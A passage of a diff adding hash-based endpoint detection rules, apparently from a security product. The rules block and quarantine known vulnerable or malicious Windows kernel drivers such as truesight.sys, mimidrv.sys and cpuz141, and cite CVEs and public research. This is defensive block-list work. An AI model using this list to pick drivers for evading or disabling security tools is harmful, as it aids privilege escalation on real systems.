+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e9b011f78de85f1fc8668715f2e6d45ac54490de6bfcef4606f5a9b5d4c016e2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b4bca38-85be-52f9-99cb-b705c3f4bb22",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622544Z",
+ "creation_date": "2026-03-23T11:45:29.622546Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622551Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4324f3d1e4007f6499a3d0f0102cd92ed9f554332bc0b633305cd7b957ff16c8",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b55c916-ff55-5a94-95ca-f61f48eba0b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474088Z",
+ "creation_date": "2026-03-23T11:45:31.474092Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474103Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2d0e06009cc878d926dce6cabea21892a8cccfc1d9aebb64ff63b6db24711719",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b66ff0a-82a4-5db7-8c11-c9c825119b73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836378Z",
+ "creation_date": "2026-03-23T11:45:30.836380Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836386Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "235195db6d1ecc4c264e231ac07f282d2ce899243ab8509db9d58232a7379b3a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b694244-2a08-5c41-b72f-f3b6a781f45b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154786Z",
+ "creation_date": "2026-03-23T11:45:31.154788Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154794Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e492c59970771138c78b4f8b069c4adec06ccccb0d4275b1d585c80a4e968a61",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b876d8e-9919-5d13-a6d5-95a82d65e4b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614041Z",
+ "creation_date": "2026-03-23T11:45:29.614043Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614048Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b78cb190a4968d06f2cdab65ea0106bc47eefdaffc871ba5dd2c2dccadb1e403",
+ "comment": "Huawei vulnerable drivers (aka HwOs2Ec10x64.sys and HwOs2Ec7x64.sys) [CVE-2019-5241] [https://www.microsoft.com/security/blog/2019/03/25/from-alert-to-driver-vulnerability-microsoft-defender-atp-investigation-unearths-privilege-escalation-flaw/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b8bf0ad-2273-5c2a-98e2-34d5d33a6c81",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832677Z",
+ "creation_date": "2026-03-23T11:45:30.832679Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832684Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b13314c6f8542d00987278da7bcc3a5833882533c249eee4a4ffed6b01f7e076",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b9ca365-99c1-5227-8d1f-5063fc11ecac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465255Z",
+ "creation_date": "2026-03-23T11:45:30.465258Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465267Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7a665a695ec3c0f862a0d762ad55aff6ce6014359647e7c7f7e3c4dc3be81b7",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b9e600a-5acc-541e-b6f7-01e531fda2ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819995Z",
+ "creation_date": "2026-03-23T11:45:30.819997Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820002Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0a60e07b06033497ded62ed49fbf3eb3d8fe750eebc3f0c332f5d84ab17e045",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9bb0dbd1-7927-5648-9369-9a348f0396d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611779Z",
+ "creation_date": "2026-03-23T11:45:29.611781Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611786Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz141_x64.sys) [CVE-2017-15303] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9bb2fcd0-b870-5e90-87fc-ad499d38ace3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831549Z",
+ "creation_date": "2026-03-23T11:45:30.831551Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831556Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbb16ed786b6aa2114c413f32b479fb0ad32ef51c3ed2a3bf246c64cc67a2f71",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9bb54a80-8b45-5b34-9847-4885ef01f70d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466413Z",
+ "creation_date": "2026-03-23T11:45:30.466417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466425Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "02ebf848fa618eba27065db366b15ee6629d98f551d20612ac38b9f655f37715",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9bd20355-6307-566d-9c70-4e7bc74e3dd0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836433Z",
+ "creation_date": "2026-03-23T11:45:30.836435Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836441Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f38278507925c3b52ed85bc8c9c59ae7165d250c2214ff828e8ff3873e39853",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9bd5fc0f-1d94-5c27-976b-8a7e882016d2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826102Z",
+ "creation_date": "2026-03-23T11:45:31.826104Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826110Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8713acee437abc90d03bc765a51b27cd4e4b1525d191a499e10d0baad1cd4093",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9bdac16c-a7db-50be-8c83-56ee90347f86",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815347Z",
+ "creation_date": "2026-03-23T11:45:31.815349Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815355Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd3307c8636e6789a1ccc4c7906b37d36daa4caa25049e50d40eb66b88a28e90",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9bde7ebb-5a82-52aa-8a92-097be6674b6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975621Z",
+ "creation_date": "2026-03-23T11:45:29.975623Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975629Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e16dc51c51b2df88c474feb52ce884d152b3511094306a289623de69dedfdf48",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9bdf68fd-ee79-5447-bb0f-7d4d6c091a4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823472Z",
+ "creation_date": "2026-03-23T11:45:31.823475Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823484Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05db222530d33503428366d5fb29a78944343a4fb6491a3814f7e2183671f678",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9be150ae-3697-522b-b0d8-7153e97599d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493418Z",
+ "creation_date": "2026-03-23T11:45:31.493420Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493425Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "64f6d15237777c9c3eaa1cde000093e324309d74a15394c7f6aa384c6b0322c2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9bf0ff35-5438-59da-b98f-87d679a8172c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464452Z",
+ "creation_date": "2026-03-23T11:45:30.464455Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464463Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b32fc8b15363915605c127ccbf5cbe71778f8dfbf821a25455496e969a01434",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c04a409-d24a-51fd-8249-9801f939971a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473085Z",
+ "creation_date": "2026-03-23T11:45:31.473089Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473098Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c11bd3609173965808776513612dc0607b34b949e21331cf470d5c585b20f3e8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c084e42-f113-586a-8c3c-3b094b5d4cd9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144634Z",
+ "creation_date": "2026-03-23T11:45:31.144636Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144641Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "886aa9c69a2a14e6eccdad7cbb1bbcab8413307c64c746d63d5666d2e10b31ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c09aeae-0810-5134-b61b-abad8b226c0c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830277Z",
+ "creation_date": "2026-03-23T11:45:30.830279Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830284Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da41cb1410c171dcda483cd1930922aa08385446a452a070f898ce98d3e1741b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9c2508d4-c75f-5f5f-ab3e-42051fdc65ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476214Z",
+ "creation_date": "2026-03-23T11:45:30.476217Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476226Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87e094214feb56a482cd8ae7ee7c7882b5a8dccce7947fdaa04a660fa19f41e5",
